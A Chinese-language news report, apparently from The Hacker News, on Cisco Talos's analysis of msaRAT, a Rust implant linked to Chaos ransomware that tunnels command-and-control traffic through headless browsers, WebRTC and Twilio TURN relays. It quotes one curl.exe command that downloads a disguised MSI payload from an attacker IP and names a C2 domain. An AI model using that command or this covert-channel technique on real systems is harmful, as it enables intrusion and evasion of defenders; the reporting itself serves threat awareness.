Chaos 勒索软件利用 msaRAT 通过无头 Chrome 和 Edge 路由 C2 流量
导语:Cisco Talos 披露了与 Chaos 勒索软件团伙相关的 Rust 植入程序 msaRAT。该恶意程序不主动建立出站连接,而是借助 Chrome DevTools Protocol 驱动受害主机上的无头 Chrome 或 Edge 浏览器,再利用 WebRTC 数据通道和 Twilio 的 TURN 中继服务回传 C2 流量,使攻击者服务器地址完全隐藏在合法流量之后。
Chaos 勒索软件团伙通过受害者自身的浏览器运行其命令与控制(C2)通信。Cisco Talos 在周四详细披露了 msaRAT——这个 Rust 植入程序,在一台已被入侵的 Windows 机器上被发现,位于勒索加密器部署之前。该植入程序从不主动发起出站连接,其进程仅与 127.0.0.1 通信,除此之外不与其他地址通信。它以无头模式启动 Chrome 或 Edge,并通过浏览器自带的调试 API——Chrome DevTools Protocol(CDP)来驱动浏览器。
每一条 C2 消息都从浏览器通过 WebRTC 数据通道传出,并由 Twilio 的 TURN 服务进行中继,因此防御者在网络上看到的只是一台浏览器在调用 Cloudflare 和 Twilio。攻击者自身的服务器地址根本不会出现。
msaRAT 首先通过环境变量查找 Chrome 或 Edge,然后回退到注册表中查找 Chrome。若未找到匹配的浏览器,则跳过 CDP 路径。找到浏览器后,它使用 –headless=new 以无可见窗口方式启动浏览器,通过 –remote-debugging-port 启用 CDP,并指向一个单独的 –user-data-dir。
恶意软件请求 /json/list/ 以获取可调试目标,并连接到返回的 WebSocket URL。它创建一个标签页,通过 Page.setBypassCSP 关闭内容安全策略(CSP),通过 Runtime.addBinding 注册五个回调,再调用 Runtime.evaluate 来注入存储在二进制 .rdata 段中明文 JavaScript 代码。
四个回调名称 msaOpen、msaClose、msaError 和 msaMessage 为 Talos 命名该恶意软件提供了依据,第五个回调名称是 dataAck。该 JavaScript 从 Cloudflare Worker 地址 is-01-ast[.]ols-img-12[.]workers[.]dev 获取 STUN 与 TURN 配置,Origin 与 Referer 请求头被伪装成来自微软网站的流量。它建立一个对等连接,并将 SDP offer 提交到同一端点。
返回的应答不包含 ICE candidate,且连接地址被设置为 0.0.0.0,因此无法形成直接的对等连接,整个通道通过 Twilio 的中继服务器 global.turn.twilio.com 运行。一旦数据通道建立,Cloudflare Worker 便退出通信路径。
该通道上的流量经过双重加密。浏览器负责处理 DTLS,其内部是基于 ChaCha-Poly1305 的加密方案,密钥通过 ECDH 交换生成,握手从 C2 在连接建立后立即发送的 0xFE 握手帧开始。

植入程序将传入的命令帧传递给 cmd.exe /e:ON /v:OFF /d /c <cmd> 执行。Talos 认为其发送队列与流控制机制是为可靠传输大型负载(如屏幕截图或文件)而设计的。
传输链路的两半技术本身并不新鲜。Praetorian 在 2025 年 8 月已展示会议平台的 TURN 基础设施可以承载完整的 C2 通道;Sansec 在 2026 年 3 月也发现一款窃取器使用 WebRTC 数据通道将窃取的信用卡数据绕过 HTTP 检查外传。msaRAT 则将这两种技术整合到一个与 Chaos 团伙关联的 Rust 植入程序中,并通过 CDP 驱动无头浏览器。
msaRAT 在操作员已获得执行权限之后、加密器运行之前被投递到目标机器。Talos 并未说明该机器是如何被攻陷的。该团伙已记录的作战手册包括垃圾邮件轰炸、语音钓鱼(vishing)、Quick Assist 以及用于持久化的 RMM 工具。投递命令示例如下:
curl.exe https://172.86[.]126[.]18:443/update_ms.msi -o C:\programdata\update_ms.msi
该命令使用 443 端口传输,但实际为明文 HTTP。仅围绕端口号编写、未进行协议检查的防火墙规则放行了此流量。MSI 包携带仿冒 Windows 更新的属性数据,并在安装结束时触发自定义操作,将嵌入的 DLL 直接加载到内存中。
该 DLL 即为 msaRAT:基于 Tokio 异步运行时用 Rust 编写,向安装程序导出一个名为 RUN 的函数供其调用。msaRAT 属于攻陷后的恶意软件,不依赖 Chrome 或 Edge 的任何漏洞,因此防御者无法针对这一技术本身部署浏览器补丁。
来源信息
来源:The Hacker News
原文链接:https://thehackernews.com/2026/07/chaos-ransomware-uses-msarat-to-route.html
作者:info@thehackernews.com (The Hacker News)

